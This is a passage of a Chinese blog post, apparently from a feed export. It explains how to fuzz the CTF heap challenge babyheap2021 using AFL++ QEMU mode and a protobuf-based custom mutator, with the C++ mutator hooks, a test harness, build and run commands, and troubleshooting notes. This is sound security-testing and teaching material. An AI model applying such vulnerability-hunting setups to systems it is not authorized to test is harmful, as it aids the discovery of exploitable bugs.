class="line">95</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// AFLPlusPlus interface</span></span><br><span class="line"><span class="keyword">extern</span> <span class="string">&quot;C&quot;</span> &#123;</span><br><span class="line">  <span class="type">static</span> std::default_random_engine engine_pro;</span><br><span class="line">  <span class="function"><span class="type">static</span> std::uniform_int_distribution&lt;<span class="type">unsigned</span> <span class="type">int</span>&gt; <span class="title">dis</span><span class="params">(<span class="number">0</span>, UINT32_MAX)</span></span>;</span><br><span class="line"></span><br><span class="line">  <span class="function"><span class="type">void</span> *<span class="title">afl_custom_init</span><span class="params">(<span class="type">void</span> *afl, <span class="type">unsigned</span> <span class="type">int</span> seed)</span> </span>&#123;</span><br><span class="line">    <span class="meta">#<span class="keyword">pragma</span> unused (afl)</span></span><br><span class="line">    engine_pro.<span class="built_in">seed</span>(seed);</span><br><span class="line">    <span class="keyword">return</span> <span class="literal">nullptr</span>;</span><br><span class="line">  &#125;</span><br><span class="line">  </span><br><span class="line">  <span class="function"><span class="type">void</span> <span class="title">afl_custom_deinit</span><span class="params">(<span class="type">void</span> *data)</span> </span>&#123;</span><br><span class="line">    <span class="built_in">assert</span>(!data);</span><br><span class="line">  &#125;</span><br><span class="line">  </span><br><span class="line">  <span class="comment">// afl_custom_fuzz</span></span><br><span class="line">  <span class="function"><span class="type">size_t</span> <span class="title">afl_custom_fuzz</span><span class="params">(<span class="type">void</span> *data, <span class="type">unsigned</span> <span class="type">char</span> *buf, <span class="type">size_t</span> buf_size, <span class="type">unsigned</span> <span class="type">char</span> **out_buf, </span></span></span><br><span class="line"><span class="params"><span class="function">                         <span class="type">unsigned</span> <span class="type">char</span> *add_buf, <span class="type">size_t</span> add_buf_size, <span class="type">size_t</span> max_size)</span> </span>&#123;</span><br><span class="line">    <span class="meta">#<span class="keyword">pragma</span> unused (data)</span></span><br><span class="line">    <span class="meta">#<span class="keyword">pragma</span> unused (add_buf)</span></span><br><span class="line">    <span class="meta">#<span class="keyword">pragma</span> unused (add_buf_size)</span></span><br><span class="line">    </span><br><span class="line">    <span class="type">static</span> <span class="type">uint8_t</span> *saved_buf = <span class="literal">nullptr</span>;</span><br><span class="line"></span><br><span class="line">    <span class="built_in">assert</span>(buf_size &lt;= max_size);</span><br><span class="line">    </span><br><span class="line">    <span class="type">uint8_t</span> *new_buf = (<span class="type">uint8_t</span> *) <span class="built_in">realloc</span>((<span class="type">void</span> *)saved_buf, max_size);</span><br><span class="line">    <span class="keyword">if</span> (!new_buf) &#123;</span><br><span class="line">      *out_buf = buf;</span><br><span class="line">      <span class="keyword">return</span> buf_size;</span><br><span class="line">    &#125;</span><br><span class="line">    saved_buf = new_buf;</span><br><span class="line"></span><br><span class="line">    <span class="built_in">memcpy</span>(new_buf, buf, buf_size);</span><br><span class="line"></span><br><span class="line">    <span class="type">size_t</span> new_size = <span class="built_in">LLVMFuzzerCustomMutator</span>(</span><br><span class="line">      new_buf,</span><br><span class="line">      buf_size,</span><br><span class="line">      max_size,</span><br><span class="line">      <span class="built_in">dis</span>(engine_pro)</span><br><span class="line">    );</span><br><span class="line">    *out_buf = new_buf;</span><br><span class="line">    <span class="keyword">return</span> new_size;</span><br><span class="line">  &#125;</span><br><span class="line"></span><br><span class="line">  <span class="function"><span class="type">size_t</span> <span class="title">afl_custom_post_process</span><span class="params">(<span class="type">void</span>* data, <span class="type">uint8_t</span> *buf, <span class="type">size_t</span> buf_size, <span class="type">uint8_t</span> **out_buf)</span> </span>&#123;</span><br><span class="line">    <span class="meta">#<span class="keyword">pragma</span> unused (data)</span></span><br><span class="line">    <span class="comment">// new_data is never free&#x27;d by pre_save_handler</span></span><br><span class="line">    <span class="comment">// I prefer a slow but clearer implementation for now</span></span><br><span class="line">    </span><br><span class="line">    <span class="type">static</span> <span class="type">uint8_t</span> *saved_buf = <span class="literal">NULL</span>;</span><br><span class="line"></span><br><span class="line">    menuctf::ChoiceList msg;</span><br><span class="line">    std::stringstream stream;</span><br><span class="line">    <span class="comment">// 如果加载成功</span></span><br><span class="line">    <span class="keyword">if</span> (protobuf_mutator::libfuzzer::<span class="built_in">LoadProtoInput</span>(<span class="literal">true</span>, buf, buf_size, &amp;msg)) &#123;</span><br><span class="line">      <span class="built_in">ProtoToDataHelper</span>(stream, msg);</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">else</span> &#123;</span><br><span class="line">      <span class="comment">// printf(&quot;[afl_custom_post_process] LoadProtoInput Error\n&quot;);   </span></span><br><span class="line">      <span class="comment">// std::ofstream err_bin(&quot;err.bin&quot;);</span></span><br><span class="line">      <span class="comment">// err_bin.write((char*)buf, buf_size);</span></span><br><span class="line"></span><br><span class="line">      <span class="comment">// abort();</span></span><br><span class="line"></span><br><span class="line">      <span class="comment">// 如果加载失败，则返回 Exit Choice</span></span><br><span class="line">      <span class="comment">/// <span class="doctag">NOTE:</span> 错误的变异 + 错误的 trim 将会导致 post process 加载失败，尤其是 trim 逻辑。</span></span><br><span class="line">      <span class="comment">/// <span class="doctag">TODO:</span> 由于默认的 trim 会破坏样例，因此需要手动实现一个 trim，这里实现了一个空 trim，不进行任何操作</span></span><br><span class="line">      <span class="built_in">ProtoToDataHelper</span>(stream, menuctf::<span class="built_in">ExitChoice</span>());</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="type">const</span> std::string str = stream.<span class="built_in">str</span>();</span><br><span class="line"></span><br><span class="line">    <span class="type">uint8_t</span> *new_buf = (<span class="type">uint8_t</span> *) <span class="built_in">realloc</span>((<span class="type">void</span> *)saved_buf, str.<span class="built_in">size</span>());</span><br><span class="line">    <span class="keyword">if</span> (!new_buf) &#123;</span><br><span class="line">      *out_buf = buf;</span><br><span class="line">      <span class="keyword">return</span> buf_size;</span><br><span class="line">    &#125;</span><br><span class="line">    *out_buf = saved_buf = new_buf;</span><br><span class="line"></span><br><span class="line">    <span class="built_in">memcpy</span>((<span class="type">void</span> *)new_buf, str.<span class="built_in">c_str</span>(), str.<span class="built_in">size</span>());</span><br><span class="line"></span><br><span class="line">    <span class="keyword">return</span> str.<span class="built_in">size</span>();</span><br><span class="line">  &#125;</span><br><span class="line"></span><br><span class="line">  <span class="function"><span class="type">int32_t</span>  <span class="title">afl_custom_init_trim</span><span class="params">(<span class="type">void</span> *data, <span class="type">uint8_t</span> *buf, <span class="type">size_t</span> buf_size)</span> </span>&#123;</span><br><span class="line">    <span class="comment">/// <span class="doctag">NOTE:</span> disable trim</span></span><br><span class="line">    <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">  &#125;</span><br><span class="line">  </span><br><span class="line">  <span class="function"><span class="type">size_t</span> <span class="title">afl_custom_trim</span><span class="params">(<span class="type">void</span> *data, <span class="type">uint8_t</span> **out_buf)</span> </span>&#123;</span><br><span class="line">    <span class="comment">/// <span class="doctag">NOTE:</span> unreachable</span></span><br><span class="line">    <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">  &#125;</span><br><span class="line"></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li><li><p>当然，编写上面的代码需要做一次又一次的测试，这里放上笔者的测试代码片段。这部分测试代码位于 <code>afl-libprotobuf-mutator/src/dump.cc</code>。</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">inline</span> std::string <span class="title">slurp</span><span class="params">(<span class="type">const</span> std::string&amp; path)</span> </span>&#123;</span><br><span class="line">  std::ostringstream buf; </span><br><span class="line">  <span class="function">std::ifstream <span class="title">input</span> <span class="params">(path.c_str())</span></span>; </span><br><span class="line">  buf &lt;&lt; input.<span class="built_in">rdbuf</span>(); </span><br><span class="line">  <span class="keyword">return</span> buf.<span class="built_in">str</span>();</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="keyword">extern</span> <span class="string">&quot;C&quot;</span> &#123;</span><br><span class="line">  <span class="function"><span class="type">void</span> *<span class="title">afl_custom_init</span><span class="params">(<span class="type">void</span> *afl, <span class="type">unsigned</span> <span class="type">int</span> seed)</span></span>;</span><br><span class="line">  <span class="function"><span class="type">size_t</span> <span class="title">afl_custom_fuzz</span><span class="params">(<span class="type">void</span> *data, <span class="type">unsigned</span> <span class="type">char</span> *buf, <span class="type">size_t</span> buf_size, <span class="type">unsigned</span> <span class="type">char</span> **out_buf, </span></span></span><br><span class="line"><span class="params"><span class="function">                         <span class="type">unsigned</span> <span class="type">char</span> *add_buf, <span class="type">size_t</span> add_buf_size, <span class="type">size_t</span> max_size)</span></span>;</span><br><span class="line">  <span class="function"><span class="type">size_t</span> <span class="title">afl_custom_post_process</span><span class="params">(<span class="type">void</span>* data, <span class="type">uint8_t</span> *buf, <span class="type">size_t</span> buf_size, <span class="type">uint8_t</span> **out_buf)</span></span>;</span><br><span class="line">  <span class="function"><span class="type">void</span> <span class="title">afl_custom_deinit</span><span class="params">(<span class="type">void</span> *data)</span></span>;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">main</span><span class="params">(<span class="type">int</span> argc, <span class="type">char</span> *argv[])</span> </span>&#123;</span><br><span class="line">  menuctf::ChoiceList msg;</span><br><span class="line"></span><br><span class="line">  <span class="keyword">if</span> (argc == <span class="number">2</span>) &#123;</span><br><span class="line">    std::string data = <span class="built_in">slurp</span>(argv[<span class="number">1</span>]);</span><br><span class="line">    <span class="keyword">if</span>(!protobuf_mutator::libfuzzer::<span class="built_in">LoadProtoInput</span>(<span class="literal">true</span>, (<span class="type">const</span> <span class="type">uint8_t</span> *)data.<span class="built_in">c_str</span>(), data.<span class="built_in">size</span>(), &amp;msg)) &#123;</span><br><span class="line">      <span class="built_in">printf</span>(<span class="string">&quot;[afl_custom_post_process] LoadProtoInput Error\n&quot;</span>);   </span><br><span class="line">      <span class="built_in">abort</span>();</span><br><span class="line">    &#125;</span><br><span class="line">    </span><br><span class="line">    <span class="comment">// 测试变异逻辑</span></span><br><span class="line">    <span class="type">void</span>* init_data = <span class="built_in">afl_custom_init</span>(<span class="literal">nullptr</span>, <span class="built_in">time</span>(<span class="literal">NULL</span>));</span><br><span class="line">    <span class="keyword">for</span>(<span class="type">int</span> i = <span class="number">0</span>; i &lt; <span class="number">30</span>; i++) &#123;</span><br><span class="line">      <span class="type">uint8_t</span> *out_buf = <span class="literal">nullptr</span>;</span><br><span class="line">      <span class="type">size_t</span> new_size = <span class="built_in">afl_custom_fuzz</span>(init_data, (<span class="type">uint8_t</span>*)data.<span class="built_in">c_str</span>(), data.<span class="built_in">size</span>(),</span><br><span class="line">                                                  &amp;out_buf,  <span class="literal">nullptr</span>, <span class="number">0</span>, data.<span class="built_in">size</span>() + <span class="number">100</span>);</span><br><span class="line">      <span class="type">uint8_t</span> *new_str = <span class="literal">nullptr</span>;</span><br><span class="line">      <span class="type">size_t</span> new_str_size = <span class="built_in">afl_custom_post_process</span>(init_data, out_buf, new_size, &amp;new_str);</span><br><span class="line">      <span class="function">std::string <span class="title">new_str_str</span><span class="params">((<span class="type">char</span>*)new_str, new_str_size)</span></span>;</span><br><span class="line">      std::cout &lt;&lt; i &lt;&lt; <span class="string">&quot;: &quot;</span> &lt;&lt; new_str_str &lt;&lt; std::endl;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="built_in">afl_custom_deinit</span>(init_data);</span><br><span class="line">  &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">    <span class="comment">// alloc 12 &quot;[menuctf::AllocChoice]&quot;</span></span><br><span class="line">    &#123;</span><br><span class="line">      <span class="keyword">auto</span> choice = <span class="keyword">new</span> menuctf::<span class="built_in">AllocChoice</span>();</span><br><span class="line">      choice-&gt;<span class="built_in">set_size</span>(<span class="number">12</span>);</span><br><span class="line">      choice-&gt;<span class="built_in">set_content</span>(<span class="string">&quot;[menuctf::AllocChoice]&quot;</span>);</span><br><span class="line"></span><br><span class="line">      msg.<span class="built_in">add_choice</span>()-&gt;<span class="built_in">set_allocated_alloc_choice</span>(choice);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="comment">// update 2 20 &quot;[menuctf::UpdateChoice]&quot;</span></span><br><span class="line">    &#123;</span><br><span class="line">      <span class="keyword">auto</span> choice = <span class="keyword">new</span> menuctf::<span class="built_in">UpdateChoice</span>();</span><br><span class="line">      choice-&gt;<span class="built_in">set_idx</span>(<span class="number">2</span>);</span><br><span class="line">      choice-&gt;<span class="built_in">set_size</span>(<span class="number">20</span>);</span><br><span class="line">      choice-&gt;<span class="built_in">set_content</span>(<span class="string">&quot;[menuctf::UpdateChoice]&quot;</span>);</span><br><span class="line"></span><br><span class="line">      msg.<span class="built_in">add_choice</span>()-&gt;<span class="built_in">set_allocated_update_choice</span>(choice);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="comment">// DeleteChoice 3</span></span><br><span class="line">    &#123;</span><br><span class="line">      <span class="keyword">auto</span> choice = <span class="keyword">new</span> menuctf::<span class="built_in">DeleteChoice</span>();</span><br><span class="line">      choice-&gt;<span class="built_in">set_idx</span>(<span class="number">3</span>);</span><br><span class="line"></span><br><span class="line">      msg.<span class="built_in">add_choice</span>()-&gt;<span class="built_in">set_allocated_delete_choice</span>(choice);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="comment">// ViewChoice 4</span></span><br><span class="line">    &#123;</span><br><span class="line">      <span class="keyword">auto</span> choice = <span class="keyword">new</span> menuctf::<span class="built_in">ViewChoice</span>();</span><br><span class="line">      choice-&gt;<span class="built_in">set_idx</span>(<span class="number">4</span>);</span><br><span class="line"></span><br><span class="line">      msg.<span class="built_in">add_choice</span>()-&gt;<span class="built_in">set_allocated_view_choice</span>(choice);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="comment">// ExitChoice</span></span><br><span class="line">    &#123;</span><br><span class="line">      <span class="keyword">auto</span> choice = <span class="keyword">new</span> menuctf::<span class="built_in">ExitChoice</span>();</span><br><span class="line"></span><br><span class="line">      msg.<span class="built_in">add_choice</span>()-&gt;<span class="built_in">set_allocated_exit_choice</span>(choice);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="function">std::ofstream <span class="title">output_file</span><span class="params">(<span class="string">&quot;output.bin&quot;</span>, std::ios::binary)</span></span>;</span><br><span class="line">    <span class="comment">// 这里保存的 Serialize 必须使用 Partial 保存，</span></span><br><span class="line">    msg.<span class="built_in">SerializePartialToOstream</span>(&amp;output_file);</span><br><span class="line">    output_file.<span class="built_in">close</span>();</span><br><span class="line">  &#125;</span><br><span class="line"></span><br><span class="line">  <span class="comment">// std::cout &lt;&lt; &quot;msg DebugString: &quot; &lt;&lt; msg.DebugString() &lt;&lt; std::endl;</span></span><br><span class="line">  std::stringstream stream;</span><br><span class="line">  <span class="built_in">ProtoToDataHelper</span>(stream, msg);</span><br><span class="line">  std::cout &lt;&lt; stream.<span class="built_in">str</span>() &lt;&lt; std::endl;</span><br><span class="line"></span><br><span class="line">  <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li><li><p>接下来只需在 <code>afl-libprotobuf-mutator</code> 文件夹下执行 <code>./build.sh &amp;&amp; make</code>即可，完成后，在当前工作路径下将会生成 <code>dumper</code>、<code>libmutator.so</code>以及<code>mutator</code>三个文件。我们可以利用 dumper 对上面的代码进行测试，<a href="http://libmutator.so">libmutator.so</a> 用于 afl++ 中的自定义变异。</p></li></ul><h3 id="3-配置-AFL">3. 配置 AFL++</h3><p>现在压力来到了 AFL++ 这里（笑），我们先试试看能不能马上跑起来。</p><p>尝试执行以下命令来构建 AFL++：</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># 构建 AFLplusplus</span></span><br><span class="line"><span class="comment"># 1. 安装依赖项</span></span><br><span class="line"><span class="built_in">sudo</span> apt-get update</span><br><span class="line"><span class="built_in">sudo</span> apt-get install -y ninja-build build-essential python3-dev automake git flex bison libglib2.0-dev libpixman-1-dev python3-setuptools</span><br><span class="line"><span class="comment"># try to install llvm 11 and install the distro default if that fails</span></span><br><span class="line"><span class="built_in">sudo</span> apt-get install -y lld-11 llvm-11 llvm-11-dev clang-11 || <span class="built_in">sudo</span> apt-get install -y lld llvm llvm-dev clang </span><br><span class="line"><span class="built_in">sudo</span> apt-get install -y gcc-$(gcc --version|<span class="built_in">head</span> -n1|sed <span class="string">&#x27;s/.* //&#x27;</span>|sed <span class="string">&#x27;s/\..*//&#x27;</span>)-plugin-dev libstdc++-$(gcc --version|<span class="built_in">head</span> -n1|sed <span class="string">&#x27;s/.* //&#x27;</span>|sed <span class="string">&#x27;s/\..*//&#x27;</span>)-dev</span><br><span class="line"><span class="comment"># 2. 开始构建</span></span><br><span class="line"><span class="built_in">cd</span> AFLplusplus</span><br><span class="line">make distrib <span class="comment"># 这一步要等一段时间</span></span><br><span class="line"><span class="comment"># sudo make install # 将 AFL++ 安装至本机</span></span><br><span class="line"><span class="comment"># 如果不需要了可以使用 sudo make uninstall 卸载</span></span><br></pre></td></tr></table></figure><h3 id="4-运行">4. 运行</h3><p>执行以下命令运行 AFL++：</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># AFL++ 构建完成后，进入 workdir 配置语料</span></span><br><span class="line"><span class="built_in">mkdir</span> workdir</span><br><span class="line">[配置语料等等...]</span><br><span class="line"></span><br><span class="line"><span class="comment"># 设置相关环境变量</span></span><br><span class="line"><span class="built_in">export</span> AFL_CUSTOM_MUTATOR_ONLY=1 <span class="comment"># 禁用除自定义 mutator 以外的其他自带 mutator</span></span><br><span class="line"><span class="built_in">export</span> AFL_CUSTOM_MUTATOR_LIBRARY=../afl-libprotobuf-mutator/libmutator.so <span class="comment"># 指定自定义路径</span></span><br><span class="line"><span class="built_in">export</span> AFL_USE_QASAN=1  <span class="comment"># 启用 QASAN</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># 运行 AFL++</span></span><br><span class="line">AFLplusplus/afl-fuzz -i workdir/fuzz_input -o workdir/fuzz_output -Q -- ./babyheap</span><br></pre></td></tr></table></figure><p>别忘记在 workdir 中放点输入语料，语料可以通过 <code>afl-libprotobuf-mutator/dumper</code> 来随便生成一点。</p><p>运行时如果遇到 <code>afl-quemu-trace</code> 不存在，则单独执行<code>AFLplusplus/qemu_mode/build_qemu_support.sh</code> 构建即可。</p><h2 id="三、源代码">三、源代码</h2><p>相关源代码以及构建方式已开源至 <a href="https://github.com/Kiprey/protobuf_ctf_fuzz">github</a> 上。</p><h2 id="四、可改进的地方">四、可改进的地方</h2><ol><li>libprotobuf-mutator 的变异效果一般，最好手动改进一下</li><li>需要实现一下 trim 逻辑，空的 trim 逻辑可能会产生 <strong>样例爆炸</strong></li></ol><h2 id="五、一些需要注意的点">五、一些需要注意的点</h2><p>如果在运行 AFL++ 后，发现 fuzz 始终无法发现新路径，即路径始终只有一个，那么就必须考虑<strong>目标CTF文件是否可执行</strong>。以当前的 babyheap2021 为例，笔者在测试时初始 AFL++ 状态如下：</p><p><img src="/2021/09/protobuf_ctf_fuzz/image-20210927082401830.png" alt="image-20210927082401830"></p><p>尝试直接执行 babyheap，发现 <code>Permission Denied</code>无法执行。但即便赋以 excutable 权限，仍然无法执行，报错 <code>no such file or directory</code>：</p><p><img src="/2021/09/protobuf_ctf_fuzz/image-20210927082630107.png" alt="image-20210927082630107"></p><p>这一看，要么是架构问题，要么是 <a href="http://libc.so">libc.so</a> / <a href="http://ld.so">ld.so</a> 的问题。因此执行以下命令以更新 babyheap 所使用的 <a href="http://libc.so">libc.so</a> &amp; <a href="http://ld.so">ld.so</a>，之后便可以正常执行。</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">patchelf --set-interpreter /lib64/ld-linux-x86-64.so.2 ./babyheap</span><br><span class="line">patchelf --replace-needed libc.so libc.so.6 ./babyheap</span><br></pre></td></tr></table></figure><p>跑起来效果，还行？（不是很懂.jpg）</p><p><img src="/2021/09/protobuf_ctf_fuzz/image-20210927112534183.png" alt="image-20210927112534183"></p><h2 id="六、补充说明">六、补充说明</h2><blockquote><p>补充于 2022/8/25 晚。</p></blockquote><p>发现这篇文章好像有挺多人看的，而且还动手实践了（震惊）。之前想的是做一个 toy 出来玩玩，没想到有挺多人有这方面的需求。既然看的人多，那我得补充一些说明上去。</p><ul><li><p>第一点，也是最重要的一点，我当初选择这个 babyheap 作为例子是一个<strong>非常错误</strong>的想法。babyheap 本身有一些坑，例如上面说的要执行一些命令来修正；还有内部 mmap 定向内存分配在 qemu 中是无法满足的，prctl 调用也会失败，会被直接 exit 掉，需要做一些 patch 操作，详情可查看评论区。</p></li><li><p>第二点，喂入 AFL 的 testcase 必须是 protobuf bin 格式的数据。即需要事先用 <code>afl-libprotobuf-mutator/dumper</code> 将明文输入转换为 protobuf bin 格式的数据，再来喂给 AFL；直接把用户的明文数据喂入 AFL 会导致异常。</p></li><li><p>第三点，AFLplusplus 的更新频率比我想象的要快很多。我当时使用的版本为 <strong>2021年10月</strong>的，现在过了这么久，很多接口和代码都发生了变动，需要注意这点！</p></li><li><p>第四点，有好几个师傅反应这个变异效果，有那么忆点点拉跨呀。这是因为 libprotobuf-mutator 的源码中内置了两种变异，一种是自己本身的变异逻辑，再一种是使用 libfuzzer 的变异逻辑。但关键是 libfuzzer 的变异逻辑的实现是空的，变异函数返回一个0…</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// https://github.com/google/libprotobuf-mutator/blob/e5869dd9690c3f4dfb842fb90bd07a5a9ee32172/src/libfuzzer/libfuzzer_mutator.cc#L55</span></span><br><span class="line"></span><br><span class="line"><span class="built_in">LIB_PROTO_MUTATOR_WEAK_DEF</span>(<span class="type">size_t</span>, LLVMFuzzerMutate, <span class="type">uint8_t</span>*, <span class="type">size_t</span>, <span class="type">size_t</span>) &#123;</span><br><span class="line">  <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>但 protobuf fuzzer 用的就是 libfuzzer 的变异逻辑，因此得改一下代码。在每次变异之前，变异器会先获取 mutator，但这个 mutator 效果拉跨，因此需要修改这一句代码：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// https://github.com/google/libprotobuf-mutator/blob/e5869dd9690c3f4dfb842fb90bd07a5a9ee32172/src/libfuzzer/libfuzzer_macro.cc#L126</span></span><br><span class="line"></span><br><span class="line"><span class="function">Mutator* <span class="title">GetMutator</span><span class="params">()</span> </span>&#123;</span><br><span class="line">  <span class="type">static</span> Mutator mutator;  <span class="comment">// &lt;---</span></span><br><span class="line">  <span class="keyword">return</span> &amp;mutator;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>现在用的是派生类的 Mutator，得把它换成<a href="https://github.com/google/libprotobuf-mutator/blob/e5869dd9690c3f4dfb842fb90bd07a5a9ee32172/src/mutator.h#L45">基类 Mutator</a>：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// Randomly makes incremental change in the given protobuf.</span></span><br><span class="line"><span class="comment">// Usage example:</span></span><br><span class="line"><span class="comment">//    protobuf_mutator::Mutator mutator(1);</span></span><br><span class="line"><span class="comment">//    MyMessage message;</span></span><br><span class="line"><span class="comment">//    message.ParseFromString(encoded_message);</span></span><br><span class="line"><span class="comment">//    mutator.Mutate(&amp;message, 10000);</span></span><br><span class="line"><span class="comment">//</span></span><br><span class="line"><span class="comment">// Class implements very basic mutations of fields. E.g. it just flips bits for</span></span><br><span class="line"><span class="comment">// integers, floats and strings. Also it increases, decreases size of</span></span><br><span class="line"><span class="comment">// strings only by one. For better results users should override</span></span><br><span class="line"><span class="comment">// protobuf_mutator::Mutator::Mutate* methods with more useful logic, e.g. using</span></span><br><span class="line"><span class="comment">// library like libFuzzer.</span></span><br><span class="line"><span class="keyword">class</span> <span class="title class_">Mutator</span> &#123;</span><br><span class="line"> <span class="keyword">public</span>:</span><br><span class="line">    ...</span><br></pre></td></tr></table></figure><p>一直以为基类这个变异器才是 protobuf 变异的正统，那个派生变异器是个啥…</p></li></ul>]]></content>
    
    
    <summary type="html">&lt;h2 id=&quot;一、简介&quot;&gt;一、简介&lt;/h2&gt;
&lt;p&gt;看 &lt;a href=&quot;https://github.com/google/fuzzing/blob/master/docs/structure-aware-fuzzing.md&quot;&gt;fuzz 的结构感知&lt;/a&gt; 时遇到了 protobuf，觉得很有意思，于是尝试使用 protobuf 来进行快速简易的 CTF fuzz。&lt;/p&gt;
&lt;p&gt;以下以 &lt;a href=&quot;https://ctftime.org/task/16415&quot;&gt;TCTF2021-babyheap2021&lt;/a&gt; 为例，来简单说明一下自动化步骤。&lt;/p&gt;
&lt;p&gt;这里主要用到以下项目：&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href=&quot;https://github.com/AFLplusplus/AFLplusplus&quot;&gt;AFL++&lt;/a&gt;，其中的 qemu mode + qasan&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://github.com/thebabush/afl-libprotobuf-mutator&quot;&gt;afl-libprotobuf-mutator&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;需要注意的是，该 fuzz 目前处于实验性版本，可能不太稳定，仅作为学习研究使用。&lt;/p&gt;</summary>
    
    
    
    
    <category term="CTF" scheme="https://kiprey.github.io/tags/CTF/"/>
    
    <category term="Pwn" scheme="https://kiprey.github.io/tags/Pwn/"/>
    
    <category term="fuzz" scheme="https://kiprey.github.io/tags/fuzz/"/>
    
  </entry>
  
  <entry>
    <title>Pwnable.tw 部分题解-2</title>
    <link href="https://kiprey.github.io/2021/09/pwnable-tw-2/"/>
    <id>https://kiprey.github.io/2021/09/pwnable-tw-2/</id>
    <published>2021-09-23T03:12:44.000Z</published>
    <updated>2025-11-24T03:59:40.071Z</updated>
    
